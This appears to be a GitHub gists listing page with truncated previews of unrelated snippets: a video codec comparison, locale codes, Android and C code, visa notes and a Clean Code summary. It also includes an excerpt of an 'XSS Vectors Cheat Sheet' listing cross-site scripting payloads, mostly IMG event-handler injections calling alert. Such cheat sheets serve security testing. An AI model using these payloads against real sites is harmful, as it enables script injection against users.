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Hupotronic / h264-vs-vp8-test.md
Last active January 31, 2023 16:50
H.264 & VP8 Quality Comparison And Some Words on Future Video Formats

VP8 vs H.264 - Which One is Better?

So I was reading Hacker News and decided to read the comments in the thread about H.265 being approved. Pretty close to the top was this comment about VP9, Google's future video format. I have some words of my own about it and other future formats at the bottom of this post, but what jumped out from the comment to me was this part:

Many have already implemented VP8 (which is also slightly better than h.264 at this point)

The comparison linked to back up that statement is faulty for several reasons, such as not providing the source material used (hell, he doesn't even name the source material), exact encoding settings used (no, some random profiles are not enough), not providing the resulting encodes, only providing a

@rxaviers
rxaviers / gist:7360908
Last active May 10, 2024 23:34
Complete list of github markdown emoji markup

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@DavidWells
DavidWells / language-list.txt
Created September 15, 2014 20:59
List of all language abbreviations for localization purposes
<label>French (France)</label> <value>fr_FR</value>
<label>Romanian (Romania)</label> <value>ro_RO</value>
<label>Portuguese (Brazil)</label> <value>pt_BR</value>
<label>Hebrew (Israel)</label> <value>he_IL</value>
<label>Ukrainian</label> <value>uk</value>
<label>German (Germany)</label> <value>de_DE</value>
<label>Italian (Italy)</label> <value>it_IT</value>
<label>Russian (Russia)</label> <value>ru_RU</value>
<label>Dutch (Netherlands)</label> <value>nl_NL</value>
<label>Hungarian (Hungary)</label> <value>hu_HU</value>
@gitanuj
gitanuj / RecursiveFileObserver.java
Created May 20, 2015 19:15
A FileObserver for Android which monitors all the files/folders in a directory recursively.
import java.io.File;
import java.util.HashMap;
import java.util.Map;
import java.util.Stack;
import android.os.FileObserver;
/**
* A FileObserver that observes all the files/folders within given directory
* recursively. It automatically starts/stops monitoring new folders/files
@dominicknguyen
dominicknguyen / stack.c
Last active November 15, 2018 06:15
Linked List Stack in C
#include <stdio.h>
/*
Linked list implementation of Stack in C
I'm learning C so it's not that good!
Feel free to leave tips!
*/
@apolloclark
apolloclark / Buffer Overflow Tutorial in Kali.md
Last active May 13, 2023 20:14
Buffer overflow demonstration in Kali Linux, based on the Computerphile video

Visa requirements for UK conferences.

First you'll want to check if you need a visa to enter the UK.

  • Nationals of the EU, Switzerland, and EEA countries will not need a visa, and are free to work and conduct business in the UK.
  • Nationals from some designated countries such as USA may travel for tourist or business purposes under a visa exemption. The link above will detail what documents you need to provide in order to travel under a visa exemption.
  • Other nationals will need a visa.

The rules for allowable business travel under a visa exemption are covered by the same rules as those travelling under a vistor visa. If you will be travelling under a visa-exemption and the conference is covering your costs in any way you should make sure to read the relevant section below.

@wojteklu
wojteklu / clean_code.md
Last active May 10, 2024 21:32
Summary of 'Clean code' by Robert C. Martin

Code is clean if it can be understood easily – by everyone on the team. Clean code can be read and enhanced by a developer other than its original author. With understandability comes readability, changeability, extensibility and maintainability.


General rules

  1. Follow standard conventions.
  2. Keep it simple stupid. Simpler is always better. Reduce complexity as much as possible.
  3. Boy scout rule. Leave the campground cleaner than you found it.
  4. Always find root cause. Always look for the root cause of a problem.

Design rules

@kurobeats
kurobeats / xss_vectors.txt
Last active May 3, 2024 11:15
XSS Vectors Cheat Sheet
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))">
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import time
import random
import sys
def print_same_line(text):
sys.stdout.write('\r')
sys.stdout.flush()